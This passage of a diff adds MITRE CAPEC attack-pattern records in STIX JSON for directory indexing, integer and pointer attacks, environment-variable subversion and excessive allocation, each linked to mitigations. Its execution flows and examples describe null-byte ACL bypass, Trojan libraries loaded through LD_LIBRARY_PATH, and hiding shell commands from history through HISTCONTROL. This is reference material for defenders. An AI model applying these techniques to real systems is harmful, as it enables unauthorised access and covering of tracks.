"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a6a7d0d3-2377-4fba-ba62-ba4c605a8206", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.", + "id": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--99e79d18-12bf-4362-a63b-bbc4e4c958a5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use indirect references rather than actual file names.", + "id": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--233f668e-d39a-47dd-8b8e-51d1e88576f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use possible permissions on file access when developing and deploying web applications.", + "id": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-10", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.", + "id": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5c7f3e3-935d-41f4-b489-634a196c7864", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.", + "external_references": [ + { + "external_id": "CAPEC-127", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/127.html" + }, + { + "external_id": "CWE-424", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-288", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "File and Directory Discovery", + "external_id": "T1083", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1083" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-11", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Directory-Indexing" + } + ], + "id": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Directory Indexing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80\n The target application does not have direct hyperlink to the \"backup\" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a \"db_dump.php\" file in it. This sensitive data should not be disclosed publicly.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Directory Discovery: Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the adversary is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target.

    2. Techniques
    Send requests to the web server for common directory names
    If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers.
    Search for uncommon or potentially user created directories that may be present.

Experiment

  1. Iteratively explore directory/file structures: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

    2. Techniques
    Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes.
    Use a browser to manually explore the website by issuing a request ending the URL in a slash '/'.
    Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
    Sequentially request a list of common base files to each directory discovered.
    Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a \"/\" request

Exploit

  1. Read directories or files which are not intended for public viewing.: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

    2. Techniques
    Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a \"/\" request
    Try other known exploits to elevate privileges sufficient to bypass protected directories.
    List the files in the directory by issuing a request with the URL ending in a \"/\" slash.
    Access the files via direct URL and capture contents.
    Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
    Sequentially request a list of common base files to each directory discovered.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must be misconfigured to return a list of a directory's content when it receives a request that ends in a directory name rather than a file name.", + "The adversary must be able to control the path that is requested of the target.", + "The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.", + "The server version or patch level must not inherently prevent known directory listing attacks from working." + ], + "x_capec_resources_required": [ + "Ability to send HTTP requests to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass the access control of the directory of listings", + "Low": "To issue the request to URL without given a specific file name" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.", + "id": "course-of-action--e159a65a-59f4-41fb-82a5-0f5cf069b10f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d386aba-01fb-4a86-8b95-a4778cf497ab", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e159a65a-59f4-41fb-82a5-0f5cf069b10f", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "2. Preventing with .htaccess in Apache web server: In .htaccess, write \"Options-indexes\".", + "id": "course-of-action--7c00c5ac-d08c-4abb-8ce7-7000072c9d15", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--665bc535-a6b1-48ea-9fd2-4cda3661f872", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c00c5ac-d08c-4abb-8ce7-7000072c9d15", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "3. Suppressing error messages: using error 403 \"Forbidden\" message exactly like error 404 \"Not Found\" message.", + "id": "course-of-action--778c2c99-3964-42e2-9e8a-33e9adf9201b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c93af142-fad4-470f-ab94-e6b35f993234", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--778c2c99-3964-42e2-9e8a-33e9adf9201b", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", + "external_references": [ + { + "external_id": "CAPEC-128", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + } + ], + "id": "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Integer Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6" + ], + "x_capec_prerequisites": [ + "The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.", + "The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.", + "external_references": [ + { + "external_id": "CAPEC-129", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/129.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-822", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/822.html" + }, + { + "external_id": "CWE-823", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/823.html" + } + ], + "id": "attack-pattern--6295b7e2-98e9-4fc8-acbf-99769cb3cdf0", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Pointer Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target application must have a pointer variable that the attacker can influence to hold an arbitrary value." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-13", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Impair Defenses:Impair Command History Logging", + "external_id": "T1562.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/003" + }, + { + "description": "Hijack Execution Flow:Dynamic Linker Hijacking", + "external_id": "T1574.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/006" + }, + { + "description": "Hijack Execution Flow:Path Interception by PATH Environment Variable", + "external_id": "T1574.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/007" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Subverting Environment Variable Values", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80" + ], + "x_capec_child_of_refs": [ + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the adversary upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\172.16.2.100\\shared_files\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)", + "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on. Most importantly, the adversary tries to determine what environment variables might be used by the underlying software, or even the application itself.

Experiment

  1. Find user-controlled environment variables: Using the information found by probing the application, the adversary attempts to manipulate any user-controlled environment variables they have found are being used by the application, or suspect are being used by the application, and observe the effects of these changes. If the adversary notices any significant changes to the application, they will know that a certain environment variable is important to the application behavior and indicates a possible attack vector.

    2. Techniques
    Alter known environment variables such as \"$PATH\", \"$HOSTNAME\", or \"LD_LIBRARY_PATH\" and see if application behavior changes.

Exploit

  1. Manipulate user-controlled environment variables: The adversary manipulates the found environment variable(s) to abuse the normal flow of processes or to gain access to privileged resources.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e" + ], + "x_capec_prerequisites": [ + "An environment variable is accessible to the user.", + "An environment variable used by the application can be tainted with user supplied data.", + "Input data used in an environment variable is not validated properly.", + "The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an adversary may attempt to manipulate that variable." + ], + "x_capec_skills_required": { + "High": "Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.", + "Low": "In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect environment variables against unauthorized read and write access.", + "id": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e351819c-a8ce-4628-bc2d-fe25172f524f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect the configuration files which contain environment variables against illegitimate read and write access.", + "id": "course-of-action--88742f57-22ea-48b4-a8a8-aa72de425e08", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f927e9e7-a3c2-4e14-8da4-37711f2f0161", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--88742f57-22ea-48b4-a8a8-aa72de425e08", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.", + "id": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b2e048e-f266-4abc-a3e7-0430607e7aeb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege.", + "id": "course-of-action--5ea96ff9-d08f-4da5-b893-17f63f09b83e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--36c8f1a2-fc68-4417-ba38-adaa3e68a90d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ea96ff9-d08f-4da5-b893-17f63f09b83e", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.", + "external_references": [ + { + "external_id": "CAPEC-130", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/130.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-1325", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1325.html" + }, + { + "description": "Endpoint Denial of Service:Application Exhaustion Flood", + "external_id": "T1499.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/003" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Excessive Allocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (A successful excessive allocation attack forces the target system to exhaust its resources, thereby compromising the availability of its service.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de" + ], + "x_capec_prerequisites": [ + "The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + 